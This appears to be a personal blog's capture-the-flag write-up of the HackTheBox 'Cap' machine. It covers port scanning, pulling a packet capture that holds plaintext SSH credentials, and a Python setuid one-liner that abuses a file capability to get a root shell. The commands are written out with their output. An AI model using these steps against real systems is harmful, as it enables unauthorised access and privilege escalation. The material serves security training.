IT and security stuff

HTB – Cap Writeup

 neoh  main  ~/HTB/cap  sudo nmap -sSCV -p- -T4 -oN
[sudo] password for neoh: 
Starting Nmap 7.80 ( ) at 2021-11-14 16:03 EST
Nmap scan report for
Host is up (0.026s latency).
Not shown: 65532 closed ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
| fingerprint-strings: 
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 140.57 seconds

Nmap reveals FTP, SSH and HTTP. I couldn’t log successfully on FTP so went to the website.

The website reveals some sort of security web app.
We can download a PCAP file.

The pcap had nothing really interesting. Going back to the website and looking at the URL I wondered what was at /data/0. It seems like an older report. I downloaded it.

I could see an SSH authentication which was in plain text, lol.
 neoh  main  ~/HTB/validation  ssh nathan@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
nathan@'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:
 * Management:
 * Support:

  System information as of Sun Nov 14 21:13:58 UTC 2021

  System load:  0.19              Processes:             255
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 20%               IPv4 address for eth0:
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from
nathan@cap:~$ sudo -l
[sudo] password for nathan: 
Sorry, user nathan may not run sudo on cap.

After a couple minutes of enumeration, I found out something nice.

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
nathan@cap:~$ python -c 'import os; os.setuid(0); os.system("/bin/sh")'

We can use python to gain capabilities with suid.

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# whoami

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.